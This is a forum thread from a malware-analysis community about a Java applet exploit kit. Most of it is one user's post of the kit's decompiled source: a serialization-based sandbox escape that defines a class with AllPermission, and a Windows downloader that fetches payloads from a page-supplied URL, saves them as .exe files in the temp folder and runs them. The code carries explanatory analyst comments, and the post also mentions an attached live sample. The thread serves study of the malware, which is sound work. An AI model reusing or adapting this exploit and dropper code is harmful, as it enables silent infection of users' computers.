Author Topic: JAVA Exploit Kit Malware Analysis  (Read 5342 times)


January 06, 2010, 03:47:21 am

ratsoul

Hi all,

I have just published an article about a JAVA Exploit Kit Malware. It uses the Object Serialization exploit. The article is here: http://www.inreverse.net/?p=804.

Regards,
 - ratsoul

January 06, 2010, 09:15:13 am
Reply #1

SysAdMini

Thanks for this interesting article.
Ruining the bad guy's day

February 28, 2010, 09:41:54 am
Reply #2

BADMAN

Thanks! But I haven't understood how to get the malicious link from the .jar file.

March 01, 2010, 11:33:46 am
Reply #3

parody

A .jar is just a PKZip file. Use WinRAR/WinZip/7-Zip/etc. to unpack it.

March 01, 2010, 01:39:07 pm
Reply #4

BADMAN

A .jar is just a PKZip file. Use WinRAR/WinZip/7-Zip/etc. to unpack it.
Yes, of course.
I have decompiled the malicious .jar file:
AppletX.class
package myf.y;

import java.applet.Applet;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;

/**
 * Decompiled sample from the posted .jar, reproduced byte-for-byte with analyst
 * comments added; it is not meant to be compiled or run.
 *
 * Applet entry point of the kit. {@code init()} hex-decodes an embedded Java
 * object-serialization stream (it begins with the stream magic {@code ACED0005},
 * and the bytes right after it spell {@code java.util.GregorianCalendar}) and
 * hands it to {@code ObjectInputStream.readObject()}. Further along, the same
 * stream spells {@code myf.y.LoaderX}, followed by bytes that appear to encode
 * LoaderX's serialVersionUID, so reading the calendar also deserializes a
 * LoaderX object, whose {@code readObject} publishes itself in
 * {@code LoaderX.instance}. This is the "Object Serialization exploit" the
 * thread's article refers to; the calendar wrapper is presumably what lets the
 * nested object be created with more privilege than the applet has (that part
 * of the JDK is not shown on this page).
 *
 * The static fields below are the same stream cut into fragments with noisy
 * names, plus filler ({@code a5}). They are assembled into
 * {@code serializedObject}, which nothing in this class reads -- {@code init()}
 * rebuilds the stream from its own locals -- so the fields look like decoys for
 * string-based scanners (inference, not shown by the code).
 */
public class AppletX extends Applet
{
  private static final long serialVersionUID = -3238297386635759160L;
  // Stream prefix after the ACED magic: version 0005, then the length-prefixed
  // class name "java.util.Grego..." (the rest of the name is in other fragments).
  private static String ff = "00057372001B6A6176612E7574696C2E477265676F7";
  private static String as = "00000";
  private static String afc = "44461794";
  private static String afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha = "646549000";
  // Decodes to the java.util.Calendar field descriptors ("nient", "minimalDaysInFirstWeek",
  // "nextStamp", "serialVersionOnStream", "time", "fields", "isSet", "zone", "Ljava/util/TimeZ").
  private static String afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha = "6E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D7049001573657269616C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
  private static String lol = "73657269616C56657273696F6E4F6E53747265616D4900087";
  private static String kol = "6F6E7468490007656E6454696D6549000B656E6454696D6";
  // Decodes to the tail of the SimpleTimeZone descriptor ("Year", "useDaylight", "monthLength")
  // and the java.util.TimeZone class descriptor.
  private static String gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj = "4596561725A000B7573654461796C696768745B000B6D6F6E74684C656E6774687400025B42787200126A6176612E7574696C2E54696D655A6F6E6531B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537472696E673B787074000E4";
  private static String kkk = "2744D6F6E7468490009737461727454696D6549000D7374617";

  // Decodes to the java.util.SimpleTimeZone class descriptor.
  private static String asa = "010101010101010101737200186A6176612E7574696C2E53696D706C6554696D655A6F6E65FA675D60D15EF5A603001249000A64737453";
  // Decodes to "gregorianCutover" and the java.util.Calendar class descriptor.
  private static String abc = "B0D0C10200014A0010677265676F7269616E4375746F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8E03000B5A000C6172654669656C647353657449";
  // Filler text; never referenced.
  private static String a5 = "sdfsd fsdf hsd fkjw fekwe gfrjkg kj54 tkj nkj4 609hyi9h0009e433333333333333333333333333333333333349tugreo9ug 9rugjjjjjjj9 woiuwwwwwwwwwwwwwwwwwwuqrfj 29fu 09epwoooooooooog poreig iorehg oia;sjhdfiosjgf dhhhhhhhhhhhhh";
  private static String klls = "87001" + as + "0010101" + as + "001" + as + "002" + as + "001" + as + "121563AFC0E757200025B494DBA602676EAB2A5020000787" + as + "0011" + as + "001" + as + "7D9" + as + "004" + as + "015" + as + "004" + as + "012" + as + "08A" + as + "002" + as + "003" + as + "001" + as + "004" + as + "01" + as + "0011" + as + "022" + as + "2DEFE488C" + as + "00000757200025B5A578F203914B85DE2020000787" + as + "00110101010101010101" + asa + "6176696E6773490006656E6" + afc + "9000C656E6" + afc + "F665765656B490007656E644D6F" + afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha + "8656E644D" + kol + "54D6F" + afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha + "97261774F6666736574490015" + lol + "37461727" + afc + "9000E737461727" + afc + "F665765656B49000973746172744D6F" + afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha + "A73";

  // Contains "myf.y.LoaderX" (6D79662E792E4C6F61646572 58) followed by bytes that
  // appear to be LoaderX's serialVersionUID -- the nested object the exploit creates.
  private static String a1 = "0007571007E0006" + as + "002" + as + "00000000000787372000D6D79662E792E4C6F61646572585E8B4C67DDC409D8020000787078FFFFF4E";
  // Contains the time-zone id "America/Dawson" (416D65726963612F446177736F6E).
  private static String a2 = "61727" + gGGGGGGGGLGKGFJDHFDfdfgdhgfsjgfjsdgf7sgfjsdgfhgdf7ysgdfj + "16D65726963612F446177736F6E0036EE8" + as + "00000" + as + "00000" + as + "00000" + as + "00000" + as + "0000FE488C0000000002" + as + "00000" + as + "00000" + as + "00000" + as + "00000" + as + "00000" + as + "000757200025B42ACF317F8060854E002000078700000000C1F1C1F1E1F1E1F1F1E1F1E1F770A" + as + "006" + as + "0000" + a1 + "2F96";

  private static String a31 = "9697354696D655365745A00076C65" + afcFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFha + "F6E6";
  private static String a32 = "000" + a31 + "53B7" + klls + "74617" + kkk + "27454696D654D6F" + afcdsnhbskjdbfsdhbfsjkdlnknbaskjbadjha + "97374" + a2 + "4A";
  private static String a33 = "C656E6461728F3DD7D6E5" + abc + "000E666972737" + afc + "F665";
  public static String a34 = "43616" + a33 + "765656B5A" + a32 + "C0";

  // Full stream reassembled from the fragments; not read anywhere in this class.
  private final String serializedObject = "ACED" + ff + "269616E" + a34 + "00A";
  // Not read anywhere in this class (PX has a static field of the same name).
  public static String data = null;

  /**
   * Applet lifecycle hook: deserializes the embedded GregorianCalendar stream,
   * and if that produced a LoaderX instance, forwards the applet's HTML
   * parameters to it. Every failure is swallowed (see the catch below), so on
   * a JVM where the deserialization does not work the applet simply does
   * nothing visible.
   */
  public void init()
  {
    try
    {
      // Hex pieces of the same stream the static fields encode; str1 is a run
      // of zero bytes reused many times, str2 is "Ti" (part of "TimeZone").
      String str1 = "000000";
      String str2 = "5469";
      // "gregorianCutover" + java.util.Calendar class descriptor and its fields.
      String str3 = "0010677265676F7269616E4375746F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8E03000B5A000C6172654669656C647353657449000E66697273744461794F665765656B5A00096973" + str2 + "6D655365745A00076C656E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D7049001573657269616C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F" + str2 + "6D655A6F6E653B787001" + str1 + "010101" + str1 + "01" + str1 + "02" + str1 + "0100000121563A";
      String str4 = "200014A" + str3 + "FC0E757200025B494DBA602676EAB2A5020000787" + str1 + "011" + str1 + "01000007D9" + str1 + "04" + str1 + "15" + str1 + "04" + str1 + "12" + str1 + "8A" + str1 + "02" + str1 + "03" + str1 + "01" + str1 + "04" + str1 + "1" + str1 + "011" + str1 + "22000002DEFE488C" + str1 + "0000757200025B5A578F203914B85DE2020000787" + str1 + "0110101010101010";
      // SimpleTimeZone field descriptors, java.util.TimeZone descriptor and the
      // zone id "America/Dawson".
      String str5 = "6444617949000C656E644461794F665765656B490007656E644D6F6465490008656E644D6F6E7468490007656E64" + str2 + "6D6549000B656E64" + str2 + "6D654D6F64654900097261774F666673657449001573657269616C56657273696F6E4F6E53747265616D490008737461727444617949000E73746172744461794F665765656B49000973746172744D6F646549000A73746172744D6F6E74684900097374617274" + str2 + "6D6549000D7374617274" + str2 + "6D654D6F64654900097374617274596561725A000B7573654461796C696768745B000B6D6F6E74684C656E6774687400025B42787200126A6176612E7574696C2E" + str2 + "6D655A6F6E6531B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537472696E673B787074000E416D65726963612F446177736F6E0036EE8" + str1 + "000000000" + str1 + "000000" + str1 + "000000" + str1 + "0000FE4";

      // The decoded stream: ACED0005 magic, "java.util.GregorianCalendar",
      // a "java.util.SimpleTimeZone", and at the very end "myf.y.LoaderX".
      // PX.StringToBytes here is resolved through the applet's normal class
      // loader; LoaderX later defines a second, privileged copy of PX.
      ObjectInputStream localObjectInputStream = new ObjectInputStream(new ByteArrayInputStream(PX.StringToBytes("ACED00057372001B6A6176612E7574696C2E477265676F7269616E43616C656E6461728F3DD7D6E5B0D0C10" + str4 + "101010101010101010101737200186A6176612E7574696C2E53696D706C65" + str2 + "6D655A6F6E65FA675D60D15EF5A603001249000A647374536176696E6773490006656E" + str5 + "88C" + str1 + "0002" + str1 + "000000" + str1 + "000000" + str1 + "000000" + str1 + "000000" + str1 + "0000757200025B42ACF317F8060854E0020000787" + str1 + "00C1F1C1F1E1F1E1F1F1E1F1E1F770A" + str1 + "06" + str1 + "0000007571007E0006" + str1 + "02" + str1 + "0000000000787372000D6D79662E792E4C6F61646572585E8B4C67DDC409D8020000787078FFFFF4E2F964AC000A")));
      // Reading the stream is the trigger: it is what constructs the nested LoaderX.
      Object localObject = localObjectInputStream.readObject();
      // LoaderX.instance is assigned only inside LoaderX.readObject, so this
      // branch is reached only if the nested object really was deserialized.
      if ((localObject != null) && (LoaderX.instance != null))
      {
        // The download URL is NOT inside the jar: it arrives as the applet's
        // "data" parameter, i.e. from the <applet>/<object> tag of the HTML
        // page that embedded it. "cc" is the number of payloads (see PX.run).
        String str6 = getParameter("data");

        String str7 = getParameter("cc");

        if (str6 == null)
          str6 = "";
        LoaderX.instance.bootstrapPayload(str6, str7);
      }
    }
    catch (Exception localException)
    {
      // Deliberately silent: no error surfaces to the browser.
    }
  }
}
LoaderX.class
package myf.y;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

/**
 * Decompiled sample reproduced byte-for-byte with analyst comments added; not
 * meant to be compiled or run.
 *
 * Stage two of the kit. A {@code ClassLoader} subclass that is also
 * {@code Serializable}: the applet never constructs it directly -- it comes
 * into existence when the serialization stream in {@code AppletX.init()} is
 * read, and {@code readObject} records that object in the static
 * {@code instance}. {@code bootstrapPayload} then re-defines the jar's own
 * {@code PX} class under a {@code ProtectionDomain} that grants
 * {@code AllPermission}, so the copy it creates runs outside the applet
 * sandbox, and pushes the applet's "data"/"cc" parameters into it.
 */
public class LoaderX extends ClassLoader
  implements Serializable
{
  private static final long serialVersionUID = 6812622870313961944L;
  // Set by readObject; AppletX.init() checks this to know the exploit worked.
  public static LoaderX instance = null;

  /** Default serialization; nothing custom is written. */
  private void writeObject(ObjectOutputStream paramObjectOutputStream)
    throws IOException, ClassNotFoundException
  {
    paramObjectOutputStream.defaultWriteObject();
  }

  /**
   * Deserialization hook. Publishing {@code this} in a static field is the
   * whole point: it hands the deserialized ClassLoader object back to the
   * applet code that drove the stream.
   */
  private void readObject(ObjectInputStream paramObjectInputStream)
    throws IOException, ClassNotFoundException
  {
    instance = this;
    paramObjectInputStream.defaultReadObject();
  }

  /**
   * Defines a privileged copy of PX and runs it.
   *
   * @param paramString1 the applet's "data" parameter (base URL of the payload)
   * @param paramString2 the applet's "cc" parameter (payload count, may be null)
   * @throws IOException declared but never propagated -- the catch below swallows everything
   */
  public void bootstrapPayload(String paramString1, String paramString2)
    throws IOException
  {
    // Never used.
    Object localObject1 = null;
    try
    {
      ByteArrayOutputStream localByteArrayOutputStream = new ByteArrayOutputStream();

      byte[] arrayOfByte = new byte[8192];

      // Reads the raw bytes of PX.class back out of the jar (super.getClass()
      // is just getClass() here), so the class can be defined a second time.
      InputStream localInputStream = super.getClass().getResourceAsStream("/myf/y/PX.class");

      // Filler; never used (same hex fragment as in AppletX, with spaces inserted).
      String str = "6E69656E744900166D696E696D616C446179734  96E46697273745765656B4900096E657874537461  6D7049001573657269616C56657273696F6E4F6E53  747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
      // NOTE: "int i" is declared inside the body after its use in the
      // condition -- this is how the decompiler rendered the loop and would not
      // compile as written.
      while ((i = localInputStream.read(arrayOfByte)) > 0)
      {
        int i;
        localByteArrayOutputStream.write(arrayOfByte, 0, i); }
      arrayOfByte = localByteArrayOutputStream.toByteArray();
      // The new class's CodeSource claims a local "file:///" origin.
      URL localURL = new URL("file:///");

      Certificate[] arrayOfCertificate = new Certificate[0];
      // AllPermission: the re-defined PX is effectively unsandboxed.
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(localURL, arrayOfCertificate), localPermissions);
      // This defines a separate Class object from the PX the applet loader
      // already resolved in AppletX; the reflection below targets this copy.
      Class localClass = defineClass("myf.y.PX", arrayOfByte, 0, arrayOfByte.length, localProtectionDomain);
      if (localClass != null)
      {
        Field localField1 = localClass.getField("data");
        Field localField2 = localClass.getField("cc");
        // PX's constructor calls AccessController.doPrivileged(this), so each
        // newInstance() runs PX.run(). The first one happens before the fields
        // are set, so run() returns early (data == null); the second, after
        // data/cc are assigned, performs the download.
        Object localObject2 = localClass.newInstance();
        localField1.set(localObject2, paramString1);
        localField2.set(localObject2, paramString2);
        localObject2 = localClass.newInstance();
      }
    }
    catch (Exception localException)
    {
      // Deliberately silent.
    }
  }
}
PX.class
package myf.y;

import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

/**
 * Decompiled sample reproduced byte-for-byte with analyst comments added; not
 * meant to be compiled or run.
 *
 * Final stage: the downloader. Ships in the jar and is used twice -- once as
 * an ordinary sandboxed class (AppletX calls {@code StringToBytes}), and once
 * as the copy LoaderX re-defines with AllPermission. The constructor runs
 * {@code run()} inside {@code AccessController.doPrivileged}, and {@code run()}
 * fetches {@code data + 0}, {@code data + 1}, ... up to {@code cc} files into
 * the Java temp directory and executes each one that is at least 1024 bytes.
 *
 * Host-side indicators visible from this code: a file named like
 * "{@code <Math.random() value>}.exe" (a decimal fraction) written under
 * {@code java.io.tmpdir} and then launched as a child of the browser's JVM.
 */
public class PX
  implements PrivilegedExceptionAction
{
  // Set via reflection by LoaderX.bootstrapPayload on the privileged copy.
  public static String data = null;
  public static String cc = null;

  /**
   * Decodes a hex string into bytes, two characters per byte.
   * Assumes an even-length input (an odd length would index past the end).
   *
   * @param paramString hexadecimal text
   * @return the decoded bytes
   */
  public static byte[] StringToBytes(String paramString)
  {
    byte[] arrayOfByte = new byte[paramString.length() / 2];
    // Filler; never used.
    String str = "sdjffjjjjjjjjjjsdfsduuuujf8ds";
    for (int i = 0; i < paramString.length(); i += 2) {
      arrayOfByte[(i / 2)] = (byte)((Character.digit(paramString.charAt(i), 16) << 4) + Character.digit(paramString.charAt(i + 1), 16));
    }
    return arrayOfByte;
  }

  /**
   * Privileged action: download-and-execute loop. Does nothing unless
   * {@code data} has been set, and only proceeds when "os.name" contains
   * "Windows". All errors are swallowed.
   *
   * @return always null
   */
  public Object run()
    throws Exception
  {
    // The first newInstance() in LoaderX reaches this with data still null.
    if (data == null)
      return null;
    try
    {
      String str1 = "os.name";
      // str2 / str5 below are filler; never used.
      String str2 = "00057372001B6A6176612E7574696C2E477265676F7";
      String str3 = "Windows";
      String str4 = System.getProperty(str1);
      String str5 = "00057372001B6A6176612E7574696C2E477265676Fasd7";
      // Windows-only gate.
      if (str4.indexOf(str3) >= 0)
      {
        // "cc" = how many payloads to fetch; defaults to one.
        int i = 1;
        if (cc != null)
          i = Integer.parseInt(cc);
        for (int j = 0; j < i; ++j)
        {
          // Payload URLs are the "data" applet parameter with 0, 1, 2, ... appended.
          URL localURL = new URL(data + Integer.toString(j));
          // Result discarded; openStream() below does the actual fetch.
          localURL.openConnection();
          InputStream localInputStream = localURL.openStream();
          // Filler; never used.
          String str6 = "6E69656E744900166D696E696D616C44617973496E46697273745765656B4900096E6578745374616D7049001573657269616C56657273696F6E4F6E53747265616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
          // Drop location: <java.io.tmpdir>/<random double>.exe
          String str7 = System.getProperty("java.io.tmpdir") + File.separator + Math.random() + ".exe";
          FileOutputStream localFileOutputStream = new FileOutputStream(str7);

          // Byte-at-a-time copy; l ends up as the number of bytes written.
          // "int k" declared after its use in the condition is a decompiler
          // rendering and would not compile as written.
          for (int l = 0; (k = localInputStream.read()) != -1; ++l)
          {
            int k;
            localFileOutputStream.write(k);
          }
          localInputStream.close();
          localFileOutputStream.close();
          // Filler; never used.
          String str8 = "6E69656E744900166D696E696D616C44617973496E    46697273745765656B4900096E6578745374616D704   9001573657269616C56657273696F6E4F6E53747265   616D4A000474696D655B00066669656C64737400025B495B000569735365747400025B5A4C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6";
          // Only launch files of at least 1 KiB -- presumably to skip empty or
          // error responses (inference).
          if (l >= 1024)
            Runtime.getRuntime().exec(str7);
        }
      }
    }
    catch (Exception localException) {
      // Deliberately silent.
    }
    return null;
  }

  /**
   * Constructing PX is what runs it: the constructor executes {@code run()}
   * as a privileged action, so under the AllPermission domain LoaderX gave
   * this class the download and exec above are not subject to the sandbox.
   */
  public PX()
  {
    try
    {
      AccessController.doPrivileged(this);
    }
    catch (Exception localException)
    {
      // Deliberately silent.
    }
  }
}
So how do I get the malicious link?
The file is attached.
pass:infected